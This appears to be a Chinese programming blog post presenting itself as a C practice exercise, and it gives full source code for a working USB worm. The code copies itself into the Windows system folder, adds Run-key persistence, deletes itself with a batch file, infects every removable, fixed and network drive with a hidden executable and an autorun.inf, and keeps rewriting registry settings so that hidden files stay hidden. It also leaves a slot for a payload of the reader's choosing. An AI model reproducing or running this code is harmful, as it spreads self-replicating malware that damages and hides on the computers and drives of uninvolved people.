您的位置:首页 > 编程语言 > C语言/C++

C语言练习作品 - U盘病毒模拟

2019-06-12 23:50 603 查看

学了汇编有一段时间了,觉得还是C语言比较好玩。今天就复习一下吧。我除了对远程控制木马比较了解外,对U盘病毒类型也蛮熟悉的(╮(╯▽╰)╭ 被学校机房里的电脑逼的...)U盘病毒有很多种,我就设计其中一种在我们学校机房最常见的吧~(远控难度太高了...)
     U盘病毒有个特性就是利用U盘进行传播(废话...),它会在U盘根目录里建立一个名为 autorun.inf 的文件。为什么要建立这个文件呢。 
        autorun.inf 其作用是允许在双击磁盘时自动运行指定的某个文件,是从Windows95开始的,最初用在其安装盘里,实现自动安装,以后的各版本都保留了该文件并且部分内容也可用于其他存储设备。一般光盘都会有这个文件,插入光驱内,计算机会自动执行 autorun.inf 指定的文件。原本只是为了方便而设计的。后来被一些骇客利用这个特性,在移动磁盘目录中放入病毒程序,建立autorun.inf 使其指向病毒程序。这样就达到,一双击U盘就执行里面的病毒程序,从而达到传播的目的。
         U盘病毒建立autorun.inf  的内容是:
 [AutoRun]
 OPEN=病毒程序的名字
 shellopen=打开(&O)
 shellopenCommand=病毒程序的名字
 shellopenDefault=1
 shellexplore=资源管理器(&X)
 shellexploreCommand=病毒程序的名字
 这样就能实现 无论用户双击打开U盘还是右击 用资源管理器打开 还是一样会执行U盘里面的病毒程序
 
    我想想,中了U盘病毒后的症状
 1、无法显示隐藏属性的文件还有扩展名,手动更改【文件夹选项】 中的 【 隐藏受保护的操作系统文件(推荐)】、【显示所有文件夹】、【隐藏已知类型的扩展名】这三个选项,会被马上改回去...
 2、感染系统文件夹 
3、感染U盘和硬盘其他分区 (根目录都有相同名字的autorun.inf  和 exe程序 都是隐藏属性)
 4、自删除
 5、主要目的模块(我当时还不知道它 最终目的是想干嘛)
 
那么U盘病毒大概有1,感染模块 2,自删除模块3,实时监控U盘模块 4,实时修改注册表隐藏系统文件、扩展名模块  5、主要目的模块 

基本设计思路是:执行后,自复制到系统、U盘、硬盘各分区(感染)后调用系统目录中的病毒,然后自删除。
                             系统目录中的病毒被执行后,实时监控用户U盘是否被插入,实时修改注册表达到隐藏自己的目的。然后执行真正想做的事,例如下载一些其他病毒啊,或者破坏文件啊等...
 
感染前的执行顺序是:感染系统模块 => 执行系统目录中的病毒 => 退出自删除 

感染后的执行顺序是:
 
                                                 | -  实时监控U盘      (有U盘则感染,无则进行监控)
 系统目录中的病毒被执行后 => | -  实时修改注册表 (监控注册表是否被修改,修改则改回来)     
                                                  | -  最终目的模块     (一些见不得人的事)
 

分析完毕。先写感染模块吧,考虑到U盘病毒会感染U盘 也会感染系统 所以要有两种感染模式,在写感染模块前先写判断感染的条件
 
编译环境 VC6.0 

1,感染模块
 声明两个全局变量 (代码长的时候 不建议使用全局变量)
 char FileDirSystem[MAX_PATH];  //用来保存系统文件夹中的病毒程序
 char FileName[MAX_PATH]; // 用来保存 自身路径
 
感染条件
 GetModuleFileName(NULL,FileName,MAX_PATH);   // 获取自身路径
 GetSystemDirectory(FileDirSystem,MAX_PATH);    // 获取系统目录
 strcat(FileDirSystem,"\\snss.exe");       //  snss.exe 是病毒程序名字 

if (strcmp(FileDirSystem,FileName))     // 不在系统目录则进行感染
   Ganran(1);    //
 else  // 是系统目录则不进行感染 做其他的事情
 
}
 
/********************************************************/
 //  感染模块
 /********************************************************/
 int Ganran(int i)
 {
 if (i)   //  感染系统
 {
   CopyFile(FileName,FileDirSystem,FALSE); // 覆盖性自复制至系统目录 
  SetFileAttributes(FileDirSystem,FILE_ATTRIBUTE_HIDDEN);
   HKEY RegKey;
    // 开机自启动
   RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    0, KEY_ALL_ACCESS, &RegKey);
   RegSetValueEx(RegKey, "ctfmonn", 0, REG_SZ, (const BYTE *)&FileDirSystem, MAX_PATH);
   RegCloseKey(RegKey);
   RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    0, KEY_ALL_ACCESS, &RegKey);
   RegSetValueEx(RegKey, "ctfmonn", 0, REG_SZ, (const BYTE *)&FileDirSystem, MAX_PATH);
   RegCloseKey(RegKey);
   ShellExecute(NULL,"open",FileDirSystem,0,0,SW_HIDE);   // 执行
   Del(); // 自残
   return 1;
 }
 else // 感染U盘
 {
   strcat(FileName,"Test.exe");
   FILE *fp;  
   if ((fp=fopen(FileName,"r"))!=NULL) // 检测病毒是否存在 避免重复感染
   {
    fclose(fp);
    return 1;
   }
   CopyFile(FileDirSystem,FileName,FALSE); // 将自身覆盖性复制到U盘
   SetFileAttributes(FileName,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
   FileName[2]='\0';
   strcat(FileName,"\\autorun.inf");
   if ((fp=fopen(FileName,"w+"))!=NULL)  // 写入autorun.inf文件
   {
       fputs("[AutoRun]\n",fp);
    fputs("OPEN=Test.exe\n",fp);
     fputs("shell\open=打开(&O)\n",fp);
     fputs("shell\open\Command=Test.exe\n",fp);
    fputs("shell\open\Default=1\n",fp);
    fputs("shell\explore=资源管理器(&X)\n",fp);
    fputs("shell\explore\Command=Test.exe",fp);
    fclose(fp);
    SetFileAttributes(FileName,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
   }
   else // 无法写入则返回 要么有读锁,要么已经被免疫
    return 1;
 }
 }
 
好的,感染模块写好了,感染完了然后当然就是自我消失啦
 2,自删除 (用批处理来删除自己 这个是最常用的方法 360也是用这种方法删除卸载后残留的文件)
 /********************************************************/
 //  自删除功能   
 /********************************************************/
 void Del()
 {
 FILE *fp;
 fp=fopen("C:\\system.bat","w+");
 fprintf(fp,"@echo off \n");
 fprintf(fp,":statr\nif not exist \"%s\" goto done\n",FileName);
 fprintf(fp,"del /f /q \"%s\" \n",FileName);
 fprintf(fp,"goto statr\n");
 fprintf(fp,":done\n");
 fprintf(fp,"del /f /q %%0\n");
 fclose(fp);
 ShellExecute(NULL,"open","C:\\system.bat",0,0,SW_HIDE); 
}
 
接下来是实时监控用户有没有插U盘 既然是实时的 那就用线程函数 
3,实时监控U盘模块(线程函数) 一旦发现用户插入U盘 立即进行感染
 /********************************************************/
 //  实时监控U盘,发现U盘立即进行感染
 /********************************************************/
 void WINAPI ScanDisk()  // 实时监控U盘   USB 盯死你
 {
 char szDriverName[MAX_PATH];
 do 
{
   strcpy(szDriverName, "C:\0");
 
  Sleep(1000); // 每秒监控一次  避免太消耗系统资源 
  for( szDriverName[0] = 'C'; szDriverName[0] < 'Z'; szDriverName[0]++ )
   {
    // 感染 移动磁盘、固定磁盘、网络磁盘  管你哪种类型的盘 只要可写 都有份 别急
    if( GetDriveType( szDriverName ) == DRIVE_REMOVABLE || GetDriveType( szDriverName ) == DRIVE_FIXED || GetDriveType( szDriverName ) == DRIVE_REMOTE) 
   {
      strcpy(FileName,szDriverName);     
      Ganran(0);  // 感染U盘模式
   }
 } while (1);
 }
 
接下来是防止用户看到我们的文件 实时修改注册表项 达到用户无论怎么设置【文件夹选项】都无法显示隐藏的文件、扩展名
 4,实时修改注册表隐藏系统文件、扩展名模块 (为了方便,不检查了直接修改)
 /********************************************************/
 //  修改注册表   想找我 窗户都没有 更别说门了
 /********************************************************/
 void WINAPI ScanRege()  // 实时修改注册表
 {
 HKEY RegKey;
 DWORD tmp1 = 1; // 扩展名 1隐藏  0显示
 DWORD tmp2 = 2;  //Hidden 2 隐藏   1 显示隐藏文件
 DWORD tmp0 = 0;  //ShowSuperHidden 0 隐藏  1显示
 do 
{  
   RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
    0, KEY_ALL_ACCESS, &RegKey);
   RegSetValueEx(RegKey, "CheckedValue", 0, REG_DWORD, (const BYTE *)&tmp1, sizeof(tmp1)); 
  RegCloseKey( RegKey );
   
   RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",
    0, KEY_ALL_ACCESS, &RegKey);
   RegSetValueEx(RegKey, "Hidden", 0, REG_DWORD, (const BYTE *)&tmp2, sizeof(tmp2));     // 隐藏文件
   RegSetValueEx(RegKey, "ShowSuperHidden", 0, REG_DWORD, (const BYTE *)&tmp0, sizeof(tmp0));// 隐藏受保护系统文件
   RegSetValueEx(RegKey, "HideFileExt", 0, REG_DWORD, (const BYTE *)&tmp1, sizeof(tmp1));// 隐藏扩展名
   RegCloseKey( RegKey );
   
 } while (1);
 }
 
关键的写完了 至于最后一个 最终目的模块 就不写了 .. 大家可以发挥自己的想象  想干嘛就干嘛哈
 
下面是根据病毒执行顺序 组合出完整的代码
 

本帖隐藏的内容
#include <windows.h>
 #include <stdio.h>
 void Del();  //自删除
 int Ganran(int i);    // 感染模块
 void WINAPI ScanDisk();  // 实时监控U盘
 void WINAPI ScanRege();  // 实时修改注册表
 void WINAPI Root();   // 你可以在这里添加一些恶搞代码 留来扩展用 声明为线程函数
 char FileDirSystem[MAX_PATH];  // 源病毒体所在位置
 char FileName[MAX_PATH]; // 用来保存 自身路径
   
 int APIENTRY WinMain(HINSTANCE hInstance,
                      HINSTANCE hPrevInstance,
                      LPSTR     lpCmdLine,
                      int       nCmdShow)
 {
 //////////////////////////////////////////////////////////////////////////
 // 让启动程序时的小漏斗马上消失
 GetInputState();
 PostThreadMessage(GetCurrentThreadId(),NULL,0,0);
 MSG msg;
 GetMessage(&msg, NULL, NULL, NULL);
 //////////////////////////////////////////////////////////////////////////
 GetModuleFileName(NULL,FileName,MAX_PATH);
 GetSystemDirectory(FileDirSystem,MAX_PATH);
 strcat(FileDirSystem,"\\snss.exe");    
if (strcmp(FileDirSystem,FileName))     // 不在系统目录则进行感染
   Ganran(1);
 else
 {
   // 创建一条线程用于修改 显示隐藏系统文件、扩展名的选项 
  // 看你怎么找到我  嘿嘿
    CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)ScanRege,NULL,NULL,NULL);
   // 创建一条线程用于实时监控U盘
   // 来一个U盘 就得带点东西走
   CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)ScanDisk,NULL,NULL,NULL);
   // 为避免代码出了问题 影响整个程序的运行 用子线程来去完成自己DIY的功能吧 
  CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)Root,NULL,NULL,NULL);
 
// 原本的 主线程应该是要达到 病毒设计者的目的吧    ╮(╯▽╰)╭ 没办法 谁叫我善良呢 
  Sleep(999999999); // 主线程进入睡眠状态 累了 是该好好休息啦 
  Sleep(999999999);
   Sleep(999999999); // 弄多几个 嘿嘿
   
 }
 return 0;
 }
 /********************************************************/
 //  你想干什么都可以在这里添加代码 自己看着办哈
 /********************************************************/
 void WINAPI Root()
 {
 do 

  Sleep(10000); // 没事干 每隔10 秒 震动一下窗口 吓唬吓唬他们
   HWND ForeHandle=GetForegroundWindow(); 
  for(int i=0;i<15;i++)
   {
    RECT rc;
    GetWindowRect(ForeHandle,&rc);
    MoveWindow(ForeHandle,rc.left+8,rc.top+8,rc.right-rc.left,rc.bottom-rc.top,1);
    Sleep(40);
    MoveWindow(ForeHandle,rc.left,rc.top,rc.right-rc.left,rc.bottom-rc.top,1);
    Sleep(40);
    Beep(0x0fff,10);
   }
 } while (1);
 }
 
/********************************************************/
 //  感染模块
 /********************************************************/
 int Ganran(int i)
 {
 if (i)   //  感染系统
 {
   CopyFile(FileName,FileDirSystem,FALSE); // 覆盖性自复制至系统目录 
  SetFileAttributes(FileDirSystem,FILE_ATTRIBUTE_HIDDEN);
   HKEY RegKey;
    // 开机自启动
   RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    0, KEY_ALL_ACCESS, &RegKey);
   RegSetValueEx(RegKey, "ctfmonn", 0, REG_SZ, ( 1bb8c const BYTE *)&FileDirSystem, MAX_PATH);
   RegCloseKey(RegKey);
   RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    0, KEY_ALL_ACCESS, &RegKey);
   RegSetValueEx(RegKey, "ctfmonn", 0, REG_SZ, (const BYTE *)&FileDirSystem, MAX_PATH);
   RegCloseKey(RegKey);
   ShellExecute(NULL,"open",FileDirSystem,0,0,SW_HIDE);   // 执行
   Del(); // 自残
   return 1;
 }
 else // 感染U盘
 {
   strcat(FileName,"Test.exe");
   FILE *fp;  
   if ((fp=fopen(FileName,"r"))!=NULL) // 检测病毒是否存在 避免重复感染
   {
    fclose(fp);
    return 1;
   }
   CopyFile(FileDirSystem,FileName,FALSE); // 将自身覆盖性复制到U盘
   SetFileAttributes(FileName,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
   FileName[2]='\0';
   strcat(FileName,"\\autorun.inf");
   if ((fp=fopen(FileName,"w+"))!=NULL)  // 写入autorun.inf文件
   {
       fputs("[AutoRun]\n",fp);
    fputs("OPEN=Test.exe\n",fp);
     fputs("shell\open=打开(&O)\n",fp);
     fputs("shell\open\Command=Test.exe\n",fp);
    fputs("shell\open\Default=1\n",fp);
    fputs("shell\explore=资源管理器(&X)\n",fp);
    fputs("shell\explore\Command=Test.exe",fp);
    fclose(fp);
    SetFileAttributes(FileName,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
   }
   else // 无法写入则返回 要么有读锁,要么已经被免疫
    return 1;
 }
 }
 /********************************************************/
 //  自删除功能   
 /********************************************************/
 void Del()
 {
 FILE *fp;
 fp=fopen("C:\\system.bat","w+");
 fprintf(fp,"@echo off \n");
 fprintf(fp,":statr\nif not exist \"%s\" goto done\n",FileName);
 fprintf(fp,"del /f /q \"%s\" \n",FileName);
 fprintf(fp,"goto statr\n");
 fprintf(fp,":done\n");
 fprintf(fp,"del /f /q %%0\n");
 fclose(fp);
 ShellExecute(NULL,"open","C:\\system.bat",0,0,SW_HIDE); 
}
 /********************************************************/
 //  修改注册表   想找我 窗户都没有 更别说门了
 /********************************************************/
 void WINAPI ScanRege()  // 实时修改注册表
 {
 HKEY RegKey;
 DWORD tmp1 = 1; // 扩展名 1隐藏  0显示
 DWORD tmp2 = 2;  //Hidden 2 隐藏   1 显示隐藏文件
 DWORD tmp0 = 0;  //ShowSuperHidden 0 隐藏  1显示
 do 
{  
   RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
    0, KEY_ALL_ACCESS, &RegKey);
   RegSetValueEx(RegKey, "CheckedValue", 0, REG_DWORD, (const BYTE *)&tmp1, sizeof(tmp1));
   RegCloseKey( RegKey );
   
   RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",
    0, KEY_ALL_ACCESS, &RegKey);
   RegSetValueEx(RegKey, "Hidden", 0, REG_DWORD, (const BYTE *)&tmp2, sizeof(tmp2)); 
  RegSetValueEx(RegKey, "ShowSuperHidden", 0, REG_DWORD, (const BYTE *)&tmp0, sizeof(tmp0));
   RegSetValueEx(RegKey, "HideFileExt", 0, REG_DWORD, (const BYTE *)&tmp1, sizeof(tmp1));
   RegCloseKey( RegKey );
   
 } while (1);
 }
 /********************************************************/
 //  实时监控U盘,发现U盘立即进行感染
 /********************************************************/
 void WINAPI ScanDisk()  // 实时监控U盘   USB 盯死你
 {
 char szDriverName[MAX_PATH];
 do 
{
   strcpy(szDriverName, "C:\0");
 
  Sleep(1000); // 每秒监控一次  避免太消耗系统资源 
  for( szDriverName[0] = 'C'; szDriverName[0] < 'Z'; szDriverName[0]++ )
   {
    // 感染 移动磁盘、固定磁盘、网络磁盘  管你哪种类型的盘 只要可写 都有份 别急
    if( GetDriveType( szDriverName ) == DRIVE_REMOVABLE || GetDriveType( szDriverName ) == DRIVE_FIXED || GetDriveType( szDriverName ) == DRIVE_REMOTE) 
   {
      strcpy(FileName,szDriverName);     
      Ganran(0); 
   }
   }
 } while (1);
   
 }
 

注意哈,印象中,貌似微软发布了一个可以彻底废除系统 自动播放(autorun.inf )的补丁,而且很多杀软都可以建立一个特殊的autorun.inf 文件夹,由于文件名不允许相同 所以U盘病毒无法创建相同名字的autorun.inf 文件,该文件夹用普通的方法是无法删除的。(其实,这种免疫方式不怎么样。如果不是因为微软封杀,我也会写出专门删除这种类型的文件夹模块)
 连微软都出手了,由此可见U盘病毒的危害有多大了。遭微软这种封杀,估计利用 autorun.inf 方式传播将会成为历史了...
 
还有,大家写函数的时候别学我哈,不然就会头疼咯...尽量让那些函数独立起来,函数要处理的数据就用参数传进去,结果就返回。
 
只为技术交流哈,由运行此程序所带来的一切不良后果本人概不负责

 

 

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: